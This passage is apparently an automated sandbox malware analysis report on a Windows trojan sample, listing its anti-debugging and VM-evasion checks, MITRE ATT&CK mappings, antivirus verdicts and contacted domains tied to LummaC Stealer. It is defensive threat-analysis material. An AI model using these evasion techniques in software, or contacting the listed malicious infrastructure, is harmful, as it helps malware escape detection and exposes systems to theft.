      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A87B24 second address: A87B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D16h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A87C97 second address: A87CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB10h 0x00000009 popad 0x0000000a jmp 00007F998484EB0Ah 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A87CB6 second address: A87CF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D0Ah 0x00000007 jmp 00007F9984B08D14h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F9984B08D0Ah 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a jng 00007F9984B08D0Ch 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A87CF0 second address: A87D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB11h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F998484EB06h 0x0000000f jns 00007F998484EB06h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A8810D second address: A88111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88111 second address: A88139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB0Ah 0x00000007 jmp 00007F998484EB14h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88139 second address: A8813D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A8813D second address: A88141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88141 second address: A8814F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F9984B08D06h 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A8845A second address: A8845F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A8845F second address: A88467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88766 second address: A8879C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB18h 0x00000009 pop ebx 0x0000000a jmp 00007F998484EB19h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A8879C second address: A887A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A888C8 second address: A888CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88AAC second address: A88AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88AB0 second address: A88ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A898BE second address: A898C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A898C2 second address: A898C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A898C6 second address: A898CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A9010E second address: A90114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A9B0FF second address: A9B10C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F9984B08D06h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A9DB72 second address: A9DB89 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 je 00007F998484EB06h 0x00000016 popad 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A9DB89 second address: A9DB8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A9DB8E second address: A9DBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F998484EB06h 0x0000000a jmp 00007F998484EB13h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F998484EB0Ch 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AA86D7 second address: AA86DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AAD22C second address: AAD248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F998484EB06h 0x0000000e jmp 00007F998484EB0Eh 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AAD248 second address: AAD270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F9984B08D19h 0x0000000c pushad 0x0000000d jg 00007F9984B08D06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AAD098 second address: AAD0A2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F998484EB06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AAD0A2 second address: AAD0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AAD0A8 second address: AAD0D8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F998484EB0Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jne 00007F998484EB06h 0x00000010 pushad 0x00000011 jmp 00007F998484EB11h 0x00000016 jmp 00007F998484EB0Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB187A second address: AB1880 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB1880 second address: AB18A4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F998484EB1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB18A4 second address: AB18A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB18A8 second address: AB18AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ABAF33 second address: ABAF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ABAF3E second address: ABAF88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F998484EB14h 0x0000000e push eax 0x0000000f jmp 00007F998484EB14h 0x00000014 pop eax 0x00000015 popad 0x00000016 push ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ABAF88 second address: ABAF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB9A75 second address: AB9A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB9A7A second address: AB9A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB9D24 second address: AB9D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB9D28 second address: AB9D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9984B08D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edi 0x0000000e jns 00007F9984B08D0Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9984B08D10h 0x0000001b jmp 00007F9984B08D0Fh 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ABC614 second address: ABC632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB19h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ABC632 second address: ABC642 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9984B08D12h 0x00000008 jl 00007F9984B08D06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ACCC8D second address: ACCC99 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F998484EB06h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ACE3FF second address: ACE404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ACE404 second address: ACE40A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AD2317 second address: AD2327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9984B08D0Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ADF5A7 second address: ADF5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F998484EB06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ADF5B3 second address: ADF5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9984B08D11h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ADF5CF second address: ADF5FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F998484EB0Bh 0x0000000c jmp 00007F998484EB17h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ADF162 second address: ADF183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D10h 0x00000009 pop edi 0x0000000a jng 00007F9984B08D08h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ADF183 second address: ADF189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF5F21 second address: AF5F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF607C second address: AF6080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF6080 second address: AF609C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9984B08D06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F9984B08D0Ah 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF609C second address: AF60D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB16h 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F998484EB17h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF6225 second address: AF622B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF650D second address: AF6523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB12h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF67ED second address: AF67F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF6943 second address: AF6961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F998484EB15h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFAE79 second address: AFAE83 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9984B08D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFAE83 second address: AFAE9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F998484EB17h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFB188 second address: AFB18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFB18C second address: AFB190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFB288 second address: AFB28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFB28C second address: AFB2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jnp 00007F998484EB0Bh 0x0000000f adc dx, 7244h 0x00000014 push 00000004h 0x00000016 sub dword ptr [ebp+122D2F31h], ecx 0x0000001c and dx, 7F39h 0x00000021 call 00007F998484EB09h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F998484EB0Ah 0x0000002d rdtsc
      Source: C:\Users\user\Desktop\random(3).exe Special instruction interceptor: First address: 856AAF instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random(3).exe Special instruction interceptor: First address: 856B73 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random(3).exe Special instruction interceptor: First address: 9FD772 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random(3).exe Special instruction interceptor: First address: A087A9 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random(3).exe Special instruction interceptor: First address: A91B6F instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random(3).exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
      Source: C:\Users\user\Desktop\random(3).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
      Source: C:\Users\user\Desktop\random(3).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
      Source: C:\Users\user\Desktop\random(3).exe Code function: 0_2_008572A3 rdtsc 0_2_008572A3
      Source: C:\Users\user\Desktop\random(3).exe TID: 7628 Thread sleep time: -60000s >= -30000s
      Source: C:\Users\user\Desktop\random(3).exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: random(3).exe, 00000000.00000002.1882114871.00000000009E0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
      Source: random(3).exe, 00000000.00000003.1793215658.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000002.1882716747.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000002.1882716747.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1800616960.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799909045.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: random(3).exe, 00000000.00000002.1882114871.00000000009E0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
      Source: C:\Users\user\Desktop\random(3).exe System information queried: ModuleInformation
      Source: C:\Users\user\Desktop\random(3).exe Process information queried: ProcessInformation

      Anti Debugging

      Source: C:\Users\user\Desktop\random(3).exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\random(3).exe Open window title or class name: regmonclass
      Source: C:\Users\user\Desktop\random(3).exe Open window title or class name: gbdyllo
      Source: C:\Users\user\Desktop\random(3).exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\random(3).exe Open window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\random(3).exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\random(3).exe Open window title or class name: ollydbg
      Source: C:\Users\user\Desktop\random(3).exe Open window title or class name: filemonclass
      Source: C:\Users\user\Desktop\random(3).exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\random(3).exe File opened: NTICE
      Source: C:\Users\user\Desktop\random(3).exe File opened: SICE
      Source: C:\Users\user\Desktop\random(3).exe File opened: SIWVID
      Source: C:\Users\user\Desktop\random(3).exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\random(3).exe Code function: 0_2_008572A3 rdtsc 0_2_008572A3
      Source: C:\Users\user\Desktop\random(3).exe Code function: 0_2_0083BCE0 LdrInitializeThunk,0_2_0083BCE0
      Source: random(3).exe, 00000000.00000002.1882281117.0000000000A27000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #6Program Manager
      Source: C:\Users\user\Desktop\random(3).exe Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\random(3).exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\random(3).exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      Source: Yara match File source: sslproxydump.pcap, type: PCAP

      Remote Access Functionality

      Source: Yara match File source: sslproxydump.pcap, type: PCAP
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 44 Virtualization/Sandbox Evasion | OS Credential Dumping | 851 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 44 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 223 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      Source | Detection | Scanner | Label | Link
      random(3).exe | 53% | ReversingLabs | Win32.Trojan.Generic |
      random(3).exe | 58% | Virustotal | | Browse
      random(3).exe | 100% | Avira | TR/Crypt.TPM.Gen |
      No Antivirus matches
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      explorebieology.run | 104.21.31.208 | true | false | | high
      gadgethgfub.icu | unknown | unknown | true | | unknown
      Name | Source | Malicious | Antivirus Detection | Reputation
      https://www.cloudflare.com/learning/access-management/phishing-attack/ | random(3).exe, 00000000.00000003.1793215658.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1792632697.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799758900.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1800616960.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799909045.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://www.cloudflare.com/5xx-error-landing | random(3).exe, 00000000.00000003.1793215658.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1792632697.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799909045.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799758900.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1800616960.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1792783064.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799909045.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp | false | | high
      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      104.21.31.208 | explorebieology.run | United States | | 13335 | CLOUDFLARENETUS | false
              Joe Sandbox version:42.0.0 Malachite
              Analysis ID:1629896
              Start date and time:2025-03-05 09:15:45 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 3m 25s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:2
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:random(3).exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/0@2/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated
              • Exclude process from analysis (whitelisted): SIHClient.exe
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 03:16:47 | API Interceptor | 5x Sleep call for process: random(3).exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 104.21.31.208 | JqGBbm7.exe | malicious | LummaC Stealer | |
| 104.21.31.208 | xIwQcY1fc4.exe | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer | |
| 104.21.31.208 | S6uUdOHRxv.exe | malicious | LummaC Stealer | |
| 104.21.31.208 | R3tmayKLpF.exe | malicious | LummaC Stealer | |
| 104.21.31.208 | https://masdom.com | malicious | Unknown | |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
